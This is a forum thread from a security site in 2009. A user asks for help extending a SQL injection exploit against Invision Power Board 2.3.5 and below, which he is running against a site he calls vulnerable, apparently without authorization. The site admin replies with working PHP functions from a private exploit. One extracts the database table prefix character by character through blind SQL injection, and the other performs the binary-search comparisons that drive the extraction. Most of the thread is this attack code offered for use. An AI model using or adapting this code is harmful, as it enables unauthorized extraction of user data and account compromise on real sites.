|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 58
Members: 0
Total: 58
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
IPB <= 2.3.5 injeciton - Get table prefix and usernames? |
|
Posted: Sat Jul 11, 2009 6:00 pm |
|
|
renaker |
Active user |
|
|
Joined: Nov 15, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
Hi everyone,
I've been using waraxe's IPB <= 2.3.5 (version 1.2). I've come across what would be a vulnerable site, but the table prefix isn't ibf_. Another issue is getting the username, since I'm guessing most people rely on the display name being the username.
I can code php pretty well, but my mysql knowledge is pretty primitive. Does anyone have a script out there that ether gets the table prefix, or a username from the user id? If not, if someone could so much as present the concept, I'd love to try and write a script for it and share. I've been semi-studying waraxe's script, and get I alot of it, but the mysql stuff still kinda tarts me out lol. |
|
|
|
|
|
|
|
|
Posted: Sat Jul 11, 2009 7:37 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Someone allready did modifications you are interested in:
http://www.waraxe.us/ftopict-3942.html
And for your information - here is code snippet, that does the prefix fetching magic:
Code: |
function get_prefix()
{
$out = '';
echo "Fetching prefix ...\n";
$p = '(SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)=1';
if(test_condition($p) === false)
{
die('Failed check for table count');
}
$p = '(SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)';
$len = get_num(0, 100, $p);
$len -= 16;
if($len < 0)
{
die('Prefix fetch failed!');
}
else
{
echo "prefix length is $len bytes\n";
}
//%_members_converge == 0x256d656d626572735f636f6e7665726765
$p = "(SELECT ORD(SUBSTR(table_name,%d,1)) FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name LIKE 0x256d656d626572735f636f6e7665726765)";
for($i = 1; $i < $len + 1; $i ++)
{
$p2 = sprintf($p, $i);
$ch = chr(get_num(32, 128, $p2));
echo "Got pos $i --> $ch\n";
$out .= "$ch";
echo "Current prefix: $out \n";
}
echo "\nFinal prefix: $out\n\n";
return $out;
}
|
It's coming from private exploit, but you can modify it for your own needs.
P.S. MySql version needs to be >= 5.0 because of the information_schema meta database. If MySql is older, then you need to use bruteforce or wordlists in order to guess the prefix. |
|
|
|
|
|
|
|
|
Posted: Sat Jul 11, 2009 8:53 pm |
|
|
renaker |
Active user |
|
|
Joined: Nov 15, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
very cool, thanks a lot waraxe
edit: any chance you could include the get_num function as well, it calls it, i don't have it? It would save me a lot of time <3 |
|
|
|
|
Posted: Sun Jul 12, 2009 1:17 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
renaker wrote: | very cool, thanks a lot waraxe
edit: any chance you could include the get_num function as well, it calls it, i don't have it? It would save me a lot of time <3 |
Code: |
function get_num($min, $max, $pattern)
{
$curr = $out = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$post = $pattern . "=$max";
$eq = test_condition($post);
if($eq)
{
$out = $max;
}
else
{
$out = $min;
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo "Current test: $curr-$max-$min\n";
}
return $out;
}
|
|
|
|
|
|
Posted: Sun Jul 12, 2009 5:55 pm |
|
|
renaker |
Active user |
|
|
Joined: Nov 15, 2008 |
Posts: 27 |
|
|
|
|
|
|
|
thanks agian. |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|